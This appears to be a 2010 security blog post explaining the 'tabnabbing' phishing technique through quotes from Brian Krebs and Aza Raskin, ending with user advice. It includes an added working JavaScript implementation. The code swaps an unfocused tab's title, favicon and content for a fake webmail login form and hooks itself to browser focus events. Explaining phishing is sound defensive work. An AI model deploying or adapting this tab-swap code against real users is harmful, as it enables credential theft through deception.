Latest Phishing Attack: Tabnabbing
2010-07-14
An article by Dan Raywood of SC Magazine warns of a new phishing tactic that targets open browser tabs and is 'likely to fool even the most security-conscious web surfers'.
The attack works when a user has several tabs open (six or seven, say). One of them, not currently being viewed, carries a script that waits until the tab is out of view, idles for anywhere from a few minutes to hours, and then discreetly changes the page content together with the favicon and title shown in the tab itself, so that the tab appears to be the login page for a webmail account.
Security blogger Brian Krebs stated "In this attack, the phisher need not even change the web address displayed in the browser's navigation toolbar. Rather, this particular phishing attack takes advantage of user trust and inattention to detail. Then, as the user scans their many open tabs, the favicon and title act as a strong visual cue, and the user will most likely simply think they left a webmail tab open."
Krebs continues "When they click back to the fake webmail tab, they'll see the standard webmail login page, assume they've been logged out, and provide their credentials to log in. After the user has entered their login information and sent it back to your server, you redirect them to a webmail account. Because they were never logged out in the first place, it will appear as if the login was successful."
Firefox creative lead Aza Raskin is calling this new type of phishing attack 'tabnabbing'. Raskin states, "Every time you include a third-party script on your page, or a Flash widget, you leave yourself wide open for an evil doer to use your website as a staging ground for this kind of attack. If you are the evil doer, you can have this behavior only occur once in a while, and only if the user uses a targeted service. In other words, it could be hard to detect."
Raskin added, "You can also use cross-site scripting vulnerabilities to force the attack to be performed by other websites. And for browsers that do not support changing the favicon, you can use a location.assign call to navigate the page to a controlled domain with the correct favicon. As long as the user wasn't looking at the tab when the refresh occurred (which they won't be), they'll have no idea what hit them. Combine this with lookalike Unicode domain names and even the most savvy user will have trouble detecting anything is amiss."
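The mechanism the quotes above describe, as an added illustration written for this page; it is not code from Raskin's proof of concept or from either article. The page logic is kept apart from the DOM so the same code can be hooked to a browser's `window` blur/focus events or driven from a scripted scenario with a fake page object and a manual clock. Every title, icon, delay and the disguise markup is constructed for the demo and imitates no real service; the "targeted service" refinement Raskin mentions is deliberately left out.

```javascript
// Tabnabbing mechanism, factored so it runs in a browser (pass `document`)
// and under Node with a fake page object for testing.
// All titles, icons, delays and markup below are constructed for the demo.

const LEGIT = {
  title: 'Harmless Widget Page',
  favicon: 'data:image/png;base64,iVBORw0KGgo=',   // placeholder icon (assumed)
  body: '<h1>Harmless widget</h1>',
};

// What the tab is made to look like once the user has looked away.
// Kept generic on purpose: a real tabnab copies a specific login page.
const DISGUISE = {
  title: 'Sign in - Webmail',
  favicon: 'data:image/png;base64,iVBORw0KGgo=',   // lookalike icon (assumed)
  body: '<form id="fake-login"><input name="user"><input name="pass" type="password"></form>',
};

// Minimal adapter over the three things the attack changes: title, favicon, content.
function browserPage(doc) {
  return {
    setTitle: (t) => { doc.title = t; },
    setFavicon: (href) => {
      let link = doc.querySelector('link[rel~="icon"]');
      if (!link) {
        link = doc.createElement('link');
        link.rel = 'icon';
        doc.head.appendChild(link);
      }
      link.href = href;
    },
    setBody: (html) => { doc.body.innerHTML = html; },
  };
}

// State machine of the attack. `delayMs` is how long the tab must stay
// unfocused before the swap; the write-up waits minutes, here it is configurable.
class Tabnabber {
  constructor(page, delayMs, schedule = setTimeout, cancel = clearTimeout) {
    this.page = page; this.delayMs = delayMs;
    this.schedule = schedule; this.cancel = cancel;
    this.timer = null;
    this.disguised = false;
  }
  apply(look) {
    this.page.setTitle(look.title);
    this.page.setFavicon(look.favicon);
    this.page.setBody(look.body);
  }
  // Tab lost focus: start the clock. Nothing visible changes yet.
  onBlur() {
    if (this.disguised || this.timer !== null) return;
    this.timer = this.schedule(() => {
      this.timer = null;
      this.apply(DISGUISE);
      this.disguised = true;
    }, this.delayMs);
  }
  // User came back before the delay elapsed: abort quietly. An already
  // applied disguise stays in place; that is the point of the attack.
  onFocus() {
    if (this.timer !== null) { this.cancel(this.timer); this.timer = null; }
  }
  // Put the original page back (the write-up instead redirects to the genuine
  // webmail, which is still logged in).
  restore() { this.apply(LEGIT); this.disguised = false; }
}

// Browser hook-up: blur/focus on window are the "user looked away / came back" signals.
function installInBrowser(delayMs) {
  const nab = new Tabnabber(browserPage(document), delayMs);
  window.addEventListener('blur', () => nab.onBlur());
  window.addEventListener('focus', () => nab.onFocus());
  return nab;
}

// Drive a scripted scenario against a fake page and a manual clock.
// events: [['blur'], ['wait', ms], ['focus'], ...]; returns the final tab state.
function simulate(delayMs, events) {
  const state = { title: LEGIT.title, favicon: LEGIT.favicon, body: LEGIT.body };
  const fakePage = {
    setTitle: (t) => { state.title = t; },
    setFavicon: (h) => { state.favicon = h; },
    setBody: (b) => { state.body = b; },
  };
  let pending = [];
  let now = 0;
  const schedule = (fn, ms) => { const id = { fn, at: now + ms }; pending.push(id); return id; };
  const cancel = (id) => { pending = pending.filter((p) => p !== id); };
  const nab = new Tabnabber(fakePage, delayMs, schedule, cancel);
  for (const [kind, arg] of events) {
    if (kind === 'blur') nab.onBlur();
    else if (kind === 'focus') nab.onFocus();
    else if (kind === 'wait') {
      now += arg;
      const due = pending.filter((p) => p.at <= now).sort((a, b) => a.at - b.at);
      pending = pending.filter((p) => p.at > now);
      for (const p of due) p.fn();
    }
  }
  return { ...state, disguised: nab.disguised };
}

if (typeof module !== 'undefined') module.exports = { Tabnabber, simulate, installInBrowser, LEGIT, DISGUISE };
```

Calling `simulate(1000, [['blur'], ['wait', 1500]])` returns the disguised state, while `simulate(1000, [['blur'], ['wait', 500], ['focus'], ['wait', 2000]])` returns the original one because the user came back before the delay ran out. Note that nothing in the swap touches `location`, which is exactly why Raskin's advice to compare the address bar against the site you think you are looking at still works against it.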
Raskin recommends that users keep the number of open tabs to a minimum, always check that the URL matches the site before entering any login, financial or identity information, and, if in doubt, close the tab and navigate to the page again.